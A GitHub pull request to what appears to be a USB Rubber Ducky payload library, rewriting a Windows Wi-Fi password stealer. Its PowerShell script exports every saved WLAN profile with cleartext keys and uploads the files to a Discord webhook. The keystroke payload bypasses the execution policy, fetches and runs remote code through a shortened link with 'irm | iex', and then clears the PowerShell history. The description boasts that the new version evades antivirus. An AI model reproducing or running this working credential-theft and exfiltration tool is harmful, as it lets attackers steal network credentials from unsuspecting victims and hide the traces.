### PR TITLE
Improved wifi pw to discord script

### DIFF
--- a/payloads/library/credentials/WLAN-Windows-Passwords/README.md
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/README.md
@@ -10,29 +10,29 @@ A script used to stole target WLAN Passwords.
 
 Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
 
-Then it cleans up traces of what you have done after.
-
 ## Getting Started
 
 ### Dependencies
 
 * An internet connection
 * Windows 10,11
+* Win+R and powershell working
 
 ### Executing program
 
 * Plug in your device
-* Invoke 2 netsh commands
-* Invoke-WebRequest will be entered in the Run Box to send the content
+* run Windows Powershell
+* export stored network .xml files containing passwords and more
+* send the Files to a Discord webhook and delete them on the local machine
 
 ## Credits
 
-<h2 align="center"> Aleff :octocat: </h2>
+<h2 align="center"> true_lock :octocat: </h2>
 <div align=center>
 <table>
   <tr>
     <td align="center" width="96">
-      <a href="https://github.com/aleff-github">
+      <a href="https://github.com/truelockmc/">
         <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
       </a>
       <br>Github

--- a/payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1
@@ -1,16 +1,79 @@
+# Export-Verzeichnis
+$exportDir = "$env:temp\SomeStuff"
 
-# ENG
-netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {
-    $wlan  = $_.Matches.Value
-    $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
-
-	$Body = @{
-		'username' = $env:username + " | " + [string]$wlan
-		'content' = [string]$passw
-	}
-	
-	Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)
+# Sicherstellen, dass das Exportverzeichnis existiert
+if (-not (Test-Path $exportDir)) {
+    try {
+        New-Item -ItemType Directory -Path $exportDir -Force
+    } catch {
+        Write-Host "Fehler beim Erstellen des Exportverzeichnisses: $_"
+        return
+    }
 }
 
-# Clear the PowerShell command history
+# WLAN-Profile exportieren (inkl. Schlüssel)
+try {
+    netsh wlan export profile key=clear folder=$exportDir
+} catch {
+    Write-Host "Fehler beim Exportieren der WLAN-Profile: $_"
+    return
+}
+
+# Alle exportierten XML-Dateien lesen
+$xmlFiles = Get-ChildItem -Path $exportDir -Filter "*.xml"
+if ($xmlFiles.Count -eq 0) {
+    Write-Host "Keine exportierten WLAN-Profile gefunden."
+    return
+}
+
+# Webhook-Anfrage mit Datei-Upload
+foreach ($xmlFile in $xmlFiles) {
+    $fileContent = Get-Content -Path $xmlFile.FullName -Raw
+
+    # Bereite die Daten vor
+    $formData = @{
+        "username" = "$env:COMPUTERNAME"
+        "content"  = "Hier ist das WLAN-Profil: $($xmlFile.Name)"
+    }
+
+    $formDataFiles = @{
+        "file" = New-Object System.IO.FileInfo($xmlFile.FullName)
+    }
+
+    # Setze Header für multipart/form-data
+    $boundary = [System.Guid]::NewGuid().ToString()
+    $contentType = "multipart/form-data; boundary=$boundary"
+    $body = ""
+
+    # Füge die Daten hinzu
+    foreach ($key in $formData.Keys) {
+        $body += "--$boundary`r`n"
+        $body += "Content-Disposition: form-data; name=`"$key`"`r`n"
+        $body += "`r`n"
+        $body += "$($formData[$key])`r`n"
+    }
+
+    # Füge die Datei hinzu
+    $body += "--$boundary`r`n"
+    $body += "Content-Disposition: form-data; name=`"file`"; filename=`"$($formDataFiles['file'].Name)`"`r`n"
+    $body += "Content-Type: application/octet-stream`r`n"
+    $body += "`r`n"
+    $body += [System.IO.File]::ReadAllText($formDataFiles['file'].FullName)
+    $body += "`r`n"
+    $body += "--$boundary--`r`n"
+
+    # Wandeln Sie den Body in Byte-Daten um
+    $bodyBytes = [System.Text.Encoding]::UTF8.GetBytes($body)
+
+    # Senden Sie die Anfrage
+    try {
+        $response = Invoke-RestMethod -Uri $whuri -Method Post -Body $bodyBytes -Headers @{
+            "Content-Type" = $contentType
+        }
+        Write-Host "Erfolgreich an den Webhook gesendet: $($xmlFile.Name)"
+    } catch {
+        Write-Host "Fehler beim Senden an den Webhook: $_"
+    }
+}
+
 Clear-History

--- a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
@@ -1,25 +1,24 @@
 REM ###################################################################
 REM #                                                                 |
 REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
-REM # Author       : Aleff                                            |
-REM # Description: A script used to stole target WLAN Passwords.      |
+REM # Author       : true_lock                                        |
+REM # Description: A script used to steal target WLAN Passwords.      |
 REM # Category     : Credentials                                      |
 REM # Target       : Windows 10-11                                    |
 REM # Version      : 1.0                                              |
 REM #                                                                 |
 REM ###################################################################
 
-
-
-DELAY 2000
+REM Browser History to Discord Webhook
 GUI r
-DELAY 250
-STRING powershell -w h -ep bypass $discord='
+STRING powershell
+ENTER
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force
+ENTER
 
-REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
-DEFINE DISCORD example.com
-STRING DISCORD
+REM Saved WiFi Info to Discord Webhook
+STRING $whuri='YOUR_WEBHOOK_URL'; irm https://is.gd/OooHjZ | iex
+ENTER
 
-REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
-DEFINE PAYLOAD example.com
-STRINGLN ';irm PAYLOAD | iex
+STRING exit
+ENTER


### PR DESCRIPTION
I  changed the .ps1 script, its now working on every windows machine, not only english ones.

Also it exports the full .xml files now, not only sends the Passwords.
That means you get more Information now and everyone can use the script, but you need to read a few seconds before finding the Password in the Discord Channel / in the File.

I also changed the ducky script a bit, it now takes a bit longer to work but isnt detected by AVs anymore, also it is a few lines shorter and easier to read and less likely  to make Errors.

I also changed the Credits to my name < 3 (hehe)

@maintainers : change the is.gd link please, so it no longer leads to my repo, instead please put something like YOUR_PS_SCRIPT_LINK_HERE in

thx and i hope you like it and it gets merged : )